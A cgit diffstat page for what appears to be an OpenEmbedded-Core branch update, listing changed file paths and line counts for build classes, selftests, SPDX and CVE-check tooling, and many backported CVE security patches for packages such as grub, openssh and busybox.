summaryrefslogtreecommitdiffstats
diff options
context:
space:
mode:
-rw-r--r--README.OE-Core10
-rw-r--r--meta-selftest/lib/pseudo_pyc_test1.py1
-rw-r--r--meta-selftest/lib/pseudo_pyc_test2.py1
-rw-r--r--meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb1
-rw-r--r--meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb2
-rw-r--r--meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded2
-rw-r--r--meta-selftest/recipes-test/images/oe-selftest-image.bb2
-rw-r--r--meta-selftest/recipes-test/images/wic-image-minimal.bb5
-rw-r--r--meta-selftest/recipes-test/pseudo-pyc-test/pseudo-pyc-test.bb15
-rw-r--r--meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb2
-rw-r--r--meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb1
-rw-r--r--meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb1
-rw-r--r--meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb2
-rw-r--r--meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb3
-rw-r--r--meta-skeleton/recipes-skeleton/service/service_0.1.bb1
-rw-r--r--meta/classes/archiver.bbclass22
-rw-r--r--meta/classes/base.bbclass24
-rw-r--r--meta/classes/bin_package.bbclass3
-rw-r--r--meta/classes/buildhistory.bbclass36
-rw-r--r--meta/classes/cmake.bbclass3
-rw-r--r--meta/classes/cml1.bbclass8
-rw-r--r--meta/classes/create-spdx-2.2.bbclass1067
-rw-r--r--meta/classes/create-spdx.bbclass8
-rw-r--r--meta/classes/cve-check.bbclass479
-rw-r--r--meta/classes/devshell.bbclass1
-rw-r--r--meta/classes/devtool-source.bbclass4
-rw-r--r--meta/classes/devupstream.bbclass2
-rw-r--r--meta/classes/distutils-common-base.bbclass2
-rw-r--r--meta/classes/distutils3-base.bbclass2
-rw-r--r--meta/classes/distutils3.bbclass10
-rw-r--r--meta/classes/externalsrc.bbclass29
-rw-r--r--meta/classes/fs-uuid.bbclass2
-rw-r--r--meta/classes/go.bbclass13
-rw-r--r--meta/classes/goarch.bbclass2
-rw-r--r--meta/classes/grub-efi-cfg.bbclass1
-rw-r--r--meta/classes/image-live.bbclass4
-rw-r--r--meta/classes/image.bbclass17
-rw-r--r--meta/classes/image_types.bbclass4
-rw-r--r--meta/classes/image_types_wic.bbclass20
-rw-r--r--meta/classes/insane.bbclass42
-rw-r--r--meta/classes/kernel-arch.bbclass4
-rw-r--r--meta/classes/kernel-devicetree.bbclass18
-rw-r--r--meta/classes/kernel-fitimage.bbclass187
-rw-r--r--meta/classes/kernel-module-split.bbclass5
-rw-r--r--meta/classes/kernel-yocto.bbclass55
-rw-r--r--meta/classes/kernel.bbclass75
-rw-r--r--meta/classes/libc-package.bbclass3
-rw-r--r--meta/classes/license.bbclass15
-rw-r--r--meta/classes/license_image.bbclass28
-rw-r--r--meta/classes/linux-dummy.bbclass26
-rw-r--r--meta/classes/linuxloader.bbclass6
-rw-r--r--meta/classes/metadata_scm.bbclass8
-rw-r--r--meta/classes/mirrors.bbclass5
-rw-r--r--meta/classes/multilib.bbclass2
-rw-r--r--meta/classes/nativesdk.bbclass2
-rw-r--r--meta/classes/npm.bbclass8
-rw-r--r--meta/classes/package.bbclass108
-rw-r--r--meta/classes/package_deb.bbclass4
-rw-r--r--meta/classes/package_ipk.bbclass3
-rw-r--r--meta/classes/package_pkgdata.bbclass2
-rw-r--r--meta/classes/package_rpm.bbclass9
-rw-r--r--meta/classes/patch.bbclass7
-rw-r--r--meta/classes/populate_sdk_base.bbclass18
-rw-r--r--meta/classes/populate_sdk_ext.bbclass12
-rw-r--r--meta/classes/pypi.bbclass2
-rw-r--r--meta/classes/python3native.bbclass2
-rw-r--r--meta/classes/python3targetconfig.bbclass29
-rw-r--r--meta/classes/qemuboot.bbclass3
-rw-r--r--meta/classes/report-error.bbclass2
-rw-r--r--meta/classes/reproducible_build.bbclass90
-rw-r--r--meta/classes/rm_work.bbclass15
-rw-r--r--meta/classes/rootfs-postcommands.bbclass22
-rw-r--r--meta/classes/rootfs_deb.bbclass2
-rw-r--r--meta/classes/rootfs_ipk.bbclass2
-rw-r--r--meta/classes/rootfs_rpm.bbclass2
-rw-r--r--meta/classes/rootfsdebugfiles.bbclass2
-rw-r--r--meta/classes/sanity.bbclass61
-rw-r--r--meta/classes/scons.bbclass3
-rw-r--r--meta/classes/sstate.bbclass98
-rw-r--r--meta/classes/staging.bbclass14
-rw-r--r--meta/classes/systemd.bbclass3
-rw-r--r--meta/classes/testimage.bbclass40
-rw-r--r--meta/classes/toolchain-scripts.bbclass4
-rw-r--r--meta/classes/uboot-extlinux-config.bbclass1
-rw-r--r--meta/classes/uninative.bbclass8
-rw-r--r--meta/classes/useradd-staticids.bbclass2
-rw-r--r--meta/classes/useradd.bbclass4
-rw-r--r--meta/classes/utils.bbclass2
-rw-r--r--meta/classes/waf.bbclass18
-rw-r--r--meta/conf/abi_version.conf4
-rw-r--r--meta/conf/bitbake.conf29
-rw-r--r--meta/conf/distro/include/cve-extra-exclusions.inc75
-rw-r--r--meta/conf/distro/include/default-distrovars.inc4
-rw-r--r--meta/conf/distro/include/maintainers.inc51
-rw-r--r--meta/conf/distro/include/ptest-packagelists.inc2
-rw-r--r--meta/conf/distro/include/yocto-uninative.inc11
-rw-r--r--meta/conf/layer.conf4
-rw-r--r--meta/conf/licenses.conf15
-rw-r--r--meta/conf/local.conf.sample4
-rw-r--r--meta/conf/local.conf.sample.extended23
-rw-r--r--meta/conf/machine/include/qemu.inc2
-rw-r--r--meta/conf/multilib.conf2
-rw-r--r--meta/files/common-licenses/Spencer-9412
-rw-r--r--meta/files/common-licenses/Unlicense24
-rw-r--r--meta/files/fs-perms-persistent-log.txt2
-rw-r--r--meta/files/fs-perms.txt2
-rw-r--r--meta/files/spdx-licenses.json5937
-rw-r--r--meta/files/toolchain-shar-extract.sh15
-rw-r--r--meta/files/toolchain-shar-relocate.sh13
-rw-r--r--meta/lib/bblayers/create.py2
-rw-r--r--meta/lib/buildstats.py4
-rw-r--r--meta/lib/oe/copy_buildsystem.py6
-rw-r--r--meta/lib/oe/cve_check.py212
-rw-r--r--meta/lib/oe/gpg_sign.py2
-rw-r--r--meta/lib/oe/license.py6
-rw-r--r--meta/lib/oe/package_manager.py15
-rw-r--r--meta/lib/oe/packagedata.py11
-rw-r--r--meta/lib/oe/patch.py8
-rw-r--r--meta/lib/oe/path.py21
-rw-r--r--meta/lib/oe/prservice.py4
-rw-r--r--meta/lib/oe/qa.py1
-rw-r--r--meta/lib/oe/recipeutils.py2
-rw-r--r--meta/lib/oe/reproducible.py15
-rw-r--r--meta/lib/oe/rootfs.py8
-rw-r--r--meta/lib/oe/sbom.py84
-rw-r--r--meta/lib/oe/spdx.py357
-rw-r--r--meta/lib/oe/sstatesig.py15
-rw-r--r--meta/lib/oe/terminal.py20
-rw-r--r--meta/lib/oe/utils.py5
-rw-r--r--meta/lib/oeqa/core/case.py9
-rw-r--r--meta/lib/oeqa/core/decorator/oetimeout.py5
-rw-r--r--meta/lib/oeqa/core/target/ssh.py4
-rw-r--r--meta/lib/oeqa/core/tests/cases/timeout.py13
-rwxr-xr-xmeta/lib/oeqa/core/tests/test_decorators.py6
-rw-r--r--meta/lib/oeqa/manual/eclipse-plugin.json6
-rw-r--r--meta/lib/oeqa/manual/oe-core.json2
-rw-r--r--meta/lib/oeqa/manual/toaster-managed-mode.json2
-rw-r--r--meta/lib/oeqa/runtime/cases/date.py13
-rw-r--r--meta/lib/oeqa/runtime/cases/df.py2
-rw-r--r--meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py36
-rw-r--r--meta/lib/oeqa/runtime/cases/ksample.py2
-rw-r--r--meta/lib/oeqa/runtime/cases/ltp.py2
-rw-r--r--meta/lib/oeqa/runtime/cases/pam.py3
-rw-r--r--meta/lib/oeqa/runtime/cases/parselogs.py21
-rw-r--r--meta/lib/oeqa/runtime/cases/ping.py20
-rw-r--r--meta/lib/oeqa/runtime/cases/ptest.py1
-rw-r--r--meta/lib/oeqa/runtime/cases/rpm.py32
-rw-r--r--meta/lib/oeqa/runtime/cases/rtc.py40
-rw-r--r--meta/lib/oeqa/runtime/cases/runlevel.py22
-rw-r--r--meta/lib/oeqa/runtime/cases/scp.py2
-rw-r--r--meta/lib/oeqa/runtime/cases/suspend.py33
-rw-r--r--meta/lib/oeqa/runtime/cases/terminal.py21
-rw-r--r--meta/lib/oeqa/runtime/cases/usb_hid.py22
-rw-r--r--meta/lib/oeqa/runtime/context.py33
-rw-r--r--meta/lib/oeqa/sdk/cases/buildepoxy.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/archiver.py16
-rw-r--r--meta/lib/oeqa/selftest/cases/bblayers.py5
-rw-r--r--meta/lib/oeqa/selftest/cases/bbtests.py13
-rw-r--r--meta/lib/oeqa/selftest/cases/buildoptions.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/cve_check.py220
-rw-r--r--meta/lib/oeqa/selftest/cases/devtool.py60
-rw-r--r--meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt1
-rw-r--r--meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt1
-rw-r--r--meta/lib/oeqa/selftest/cases/distrodata.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/glibc.py8
-rw-r--r--meta/lib/oeqa/selftest/cases/gotoolchain.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/imagefeatures.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/oelib/elf.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/oelib/utils.py3
-rw-r--r--meta/lib/oeqa/selftest/cases/oescripts.py3
-rw-r--r--meta/lib/oeqa/selftest/cases/pkgdata.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/prservice.py10
-rw-r--r--meta/lib/oeqa/selftest/cases/pseudo.py27
-rw-r--r--meta/lib/oeqa/selftest/cases/recipetool.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/reproducible.py128
-rw-r--r--meta/lib/oeqa/selftest/cases/runcmd.py4
-rw-r--r--meta/lib/oeqa/selftest/cases/runqemu.py9
-rw-r--r--meta/lib/oeqa/selftest/cases/runtime_test.py44
-rw-r--r--meta/lib/oeqa/selftest/cases/sstatetests.py14
-rw-r--r--meta/lib/oeqa/selftest/cases/tinfoil.py30
-rw-r--r--meta/lib/oeqa/selftest/cases/wic.py124
-rw-r--r--meta/lib/oeqa/selftest/context.py17
-rw-r--r--meta/lib/oeqa/utils/buildproject.py3
-rw-r--r--meta/lib/oeqa/utils/commands.py10
-rw-r--r--meta/lib/oeqa/utils/metadata.py6
-rw-r--r--meta/lib/oeqa/utils/nfs.py4
-rw-r--r--meta/lib/oeqa/utils/qemurunner.py41
-rw-r--r--meta/lib/oeqa/utils/targetbuild.py4
-rw-r--r--meta/recipes-bsp/efibootmgr/efibootmgr_17.bb2
-rw-r--r--meta/recipes-bsp/efivar/efivar/determinism.patch18
-rw-r--r--meta/recipes-bsp/efivar/efivar_37.bb3
-rw-r--r--meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb1
-rw-r--r--meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch39
-rw-r--r--meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch39
-rw-r--r--meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch33
-rw-r--r--meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch235
-rw-r--r--meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch30
-rw-r--r--meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch65
-rw-r--r--meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch59
-rw-r--r--meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch53
-rw-r--r--meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch52
-rw-r--r--meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch53
-rw-r--r--meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch55
-rw-r--r--meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch41
-rw-r--r--meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch34
-rw-r--r--meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch43
-rw-r--r--meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch128
-rw-r--r--meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch28
-rw-r--r--meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch43
-rw-r--r--meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch42
-rw-r--r--meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch121
-rw-r--r--meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch56
-rw-r--r--meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch35
-rw-r--r--meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch82
-rw-r--r--meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch36
-rw-r--r--meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch33
-rw-r--r--meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch43
-rw-r--r--meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch52
-rw-r--r--meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch56
-rw-r--r--meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch94
-rw-r--r--meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch78
-rw-r--r--meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch104
-rw-r--r--meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch39
-rw-r--r--meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch38
-rw-r--r--meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch34
-rw-r--r--meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch47
-rw-r--r--meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch38
-rw-r--r--meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch77
-rw-r--r--meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch42
-rw-r--r--meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch41
-rw-r--r--meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch46
-rw-r--r--meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch28
-rw-r--r--meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch33
-rw-r--r--meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch37
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch2
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372.patch76
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch130
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch431
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch57
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch52
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch158
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-25632.patch90
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-25647.patch119
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27749.patch609
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779.patch70
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch105
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch37
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch35
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch62
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch61
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch65
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-20225.patch58
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-20233.patch50
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3695.patch178
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3696.patch46
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3697.patch82
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3981.patch32
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-2601.patch87
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28733.patch60
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28734.patch67
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28735.patch271
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28736.patch275
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-3775.patch97
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2023-4692.patch97
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2023-4693.patch62
-rw-r--r--meta/recipes-bsp/grub/files/determinism.patch56
-rw-r--r--meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch117
-rw-r--r--meta/recipes-bsp/grub/files/no-insmod-on-sb.patch107
-rw-r--r--meta/recipes-bsp/grub/grub2.inc88
-rw-r--r--meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch36
-rw-r--r--meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb1
-rw-r--r--meta/recipes-bsp/opensbi/opensbi_0.6.bb3
-rw-r--r--meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb5
-rw-r--r--meta/recipes-bsp/u-boot/files/CVE-2020-10648-1.patch98
-rw-r--r--meta/recipes-bsp/u-boot/files/CVE-2020-10648-2.patch52
-rw-r--r--meta/recipes-bsp/u-boot/files/CVE-2020-8432.patch114
-rw-r--r--meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb2
-rw-r--r--meta/recipes-bsp/u-boot/u-boot-common.inc7
-rw-r--r--meta/recipes-bsp/u-boot/u-boot-tools.inc15
-rw-r--r--meta/recipes-bsp/v86d/v86d_0.1.10.bb1
-rw-r--r--meta/recipes-connectivity/avahi/avahi.inc10
-rw-r--r--meta/recipes-connectivity/avahi/avahi_0.7.bb3
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch42
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch60
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch48
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch65
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch57
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch53
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch73
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch52
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch45
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch109
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch67
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch31
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch33
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch166
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch175
-rw-r--r--meta/recipes-connectivity/bind/bind_9.11.37.bb (renamed from meta/recipes-connectivity/bind/bind_9.11.22.bb)10
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5.inc8
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch109
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch34
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch95
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch66
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch39
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch126
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch54
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5_5.55.bb10
-rw-r--r--meta/recipes-connectivity/connman/connman-gnome_0.7.bb2
-rw-r--r--meta/recipes-connectivity/connman/connman.inc2
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch62
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch231
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch33
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch72
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch121
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch50
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch37
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch266
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch54
-rw-r--r--meta/recipes-connectivity/connman/connman_1.37.bb9
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch66
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch120
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch40
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb3
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch283
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch254
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch67
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch54
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb4
-rw-r--r--meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb3
-rw-r--r--meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb8
-rw-r--r--meta/recipes-connectivity/neard/neard_0.16.bb13
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch97
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch20
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch52
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch189
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch581
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch171
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch34
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch194
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch73
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch125
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch315
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch38
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch39
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch307
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch120
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch468
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch95
-rw-r--r--meta/recipes-connectivity/openssh/openssh/sshd.socket1
-rw-r--r--meta/recipes-connectivity/openssh/openssh/sshd@.service2
-rw-r--r--meta/recipes-connectivity/openssh/openssh_8.2p1.bb58
-rw-r--r--meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch38
-rw-r--r--meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch37
-rw-r--r--meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch122
-rw-r--r--meta/recipes-connectivity/openssl/openssl/reproducibility.patch22
-rw-r--r--meta/recipes-connectivity/openssl/openssl_1.1.1w.bb (renamed from meta/recipes-connectivity/openssl/openssl_1.1.1g.bb)9
-rw-r--r--meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb1
-rw-r--r--meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch50
-rw-r--r--meta/recipes-connectivity/ppp/ppp_2.4.7.bb5
-rw-r--r--meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb2
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch45
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch58
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch123
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch609
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb5
-rw-r--r--meta/recipes-core/base-files/base-files/hosts2
-rw-r--r--meta/recipes-core/base-passwd/base-passwd_3.5.29.bb1
-rw-r--r--meta/recipes-core/busybox/busybox.inc29
-rw-r--r--meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch51
-rw-r--r--meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch38
-rw-r--r--meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch81
-rw-r--r--meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch64
-rw-r--r--meta/recipes-core/busybox/busybox/CVE-2021-42374.patch53
-rw-r--r--meta/recipes-core/busybox/busybox/CVE-2021-42376.patch138
-rw-r--r--meta/recipes-core/busybox/busybox/CVE-2022-48174.patch82
-rw-r--r--meta/recipes-core/busybox/busybox_1.31.1.bb10
-rw-r--r--meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch215
-rw-r--r--meta/recipes-core/coreutils/coreutils_8.31.bb8
-rw-r--r--meta/recipes-core/dbus-wait/dbus-wait_git.bb3
-rw-r--r--meta/recipes-core/dbus/dbus-test_1.12.24.bb (renamed from meta/recipes-core/dbus/dbus-test_1.12.16.bb)42
-rw-r--r--meta/recipes-core/dbus/dbus.inc36
-rw-r--r--meta/recipes-core/dbus/dbus/CVE-2020-12049.patch78
-rw-r--r--meta/recipes-core/dbus/dbus/CVE-2023-34969.patch96
-rw-r--r--meta/recipes-core/dbus/dbus_1.12.24.bb (renamed from meta/recipes-core/dbus/dbus_1.12.16.bb)40
-rw-r--r--meta/recipes-core/dropbear/dropbear.inc11
-rw-r--r--meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch29
-rw-r--r--meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch145
-rw-r--r--meta/recipes-core/ell/ell_0.33.bb1
-rw-r--r--meta/recipes-core/expat/expat/CVE-2013-0340.patch1758
-rw-r--r--meta/recipes-core/expat/expat/CVE-2021-45960.patch65
-rw-r--r--meta/recipes-core/expat/expat/CVE-2021-46143.patch49
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-22822-27.patch257
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-23852.patch33
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-23990.patch49
